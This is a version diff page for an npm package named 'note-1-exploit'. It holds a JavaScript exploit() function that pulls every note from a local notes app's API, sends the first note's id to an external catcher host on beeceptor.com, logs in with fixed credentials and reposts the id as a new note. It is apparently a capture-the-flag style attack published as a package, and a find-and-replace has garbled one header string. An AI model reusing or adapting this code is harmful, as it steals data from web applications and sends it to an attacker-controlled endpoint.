note-1-exploit 1.0.13 → 1.0.14
Sign up to get free protection for your applications and to get access to all the features.
- package/index.js +10 -10
- package/package.json +1 -1
package/index.js
CHANGED
|
@@ -1,11 +1,11 @@
|
|
|
1
1
|
async function exploit() {
|
|
2
|
-
let all_results = await fetch("http://
|
|
2
|
+
let all_results = await fetch("http://127.0.0.1:10082/api/notes/all", {
|
|
3
3
|
"headers": {
|
|
4
4
|
"accept": "*/*",
|
|
5
5
|
"accept-language": "zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7",
|
|
6
6
|
"sec-gpc": "1"
|
|
7
7
|
},
|
|
8
|
-
"referrer": "http://
|
|
8
|
+
"referrer": "http://127.0.0.1:10082/",
|
|
9
9
|
"referrerPolicy": "strict-origin-when-cross-origin",
|
|
10
10
|
"body": null,
|
|
11
11
|
"method": "GET",
|
|
@@ -15,16 +15,16 @@ async function exploit() {
|
|
|
15
15
|
let json_results = await all_results.json();
|
|
16
16
|
let note_name = (Math.random() + 1).toString(36).substring(7);
|
|
17
17
|
window.parent.location.replace("https://omniman.free.beeceptor.com?q=" + json_results[0].id)
|
|
18
|
-
await fetch("http://
|
|
18
|
+
await fetch("http://127.0.0.1:10082/login", {
|
|
19
19
|
"headers": {
|
|
20
|
-
"accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/
|
|
20
|
+
"accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/127.0.0.1:10082p,image/apng,*/*;q=0.8",
|
|
21
21
|
"accept-language": "zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7",
|
|
22
22
|
"cache-control": "max-age=0",
|
|
23
23
|
"content-type": "application/x-www-form-urlencoded",
|
|
24
24
|
"sec-gpc": "1",
|
|
25
25
|
"upgrade-insecure-requests": "1"
|
|
26
26
|
},
|
|
27
|
-
"referrer": "http://
|
|
27
|
+
"referrer": "http://127.0.0.1:10082/login",
|
|
28
28
|
"referrerPolicy": "strict-origin-when-cross-origin",
|
|
29
29
|
"body": "username=nnnddd&password=nnnddd",
|
|
30
30
|
"method": "POST",
|
|
@@ -32,16 +32,16 @@ async function exploit() {
|
|
|
32
32
|
"redirect": "follow",
|
|
33
33
|
"credentials": "include"
|
|
34
34
|
});
|
|
35
|
-
await fetch("http://
|
|
35
|
+
await fetch("http://127.0.0.1:10082/login", {
|
|
36
36
|
"headers": {
|
|
37
|
-
"accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/
|
|
37
|
+
"accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/127.0.0.1:10082p,image/apng,*/*;q=0.8",
|
|
38
38
|
"accept-language": "zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7",
|
|
39
39
|
"cache-control": "max-age=0",
|
|
40
40
|
"content-type": "application/x-www-form-urlencoded",
|
|
41
41
|
"sec-gpc": "1",
|
|
42
42
|
"upgrade-insecure-requests": "1"
|
|
43
43
|
},
|
|
44
|
-
"referrer": "http://
|
|
44
|
+
"referrer": "http://127.0.0.1:10082/login",
|
|
45
45
|
"referrerPolicy": "strict-origin-when-cross-origin",
|
|
46
46
|
"body": "username=nnnddd&password=nnnddd",
|
|
47
47
|
"method": "POST",
|
|
@@ -49,14 +49,14 @@ async function exploit() {
|
|
|
49
49
|
"redirect": "follow",
|
|
50
50
|
"credentials": "include"
|
|
51
51
|
});
|
|
52
|
-
await fetch("http://
|
|
52
|
+
await fetch("http://127.0.0.1:10082/api/notes", {
|
|
53
53
|
"headers": {
|
|
54
54
|
"accept": "*/*",
|
|
55
55
|
"accept-language": "zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7",
|
|
56
56
|
"content-type": "application/json",
|
|
57
57
|
"sec-gpc": "1"
|
|
58
58
|
},
|
|
59
|
-
"referrer": "http://
|
|
59
|
+
"referrer": "http://127.0.0.1:10082/",
|
|
60
60
|
"referrerPolicy": "strict-origin-when-cross-origin",
|
|
61
61
|
"body": "{\"title\":\"" + note_name + "\",\"content\":\"" + json_results[0].id + "\"}",
|
|
62
62
|
"method": "POST",
|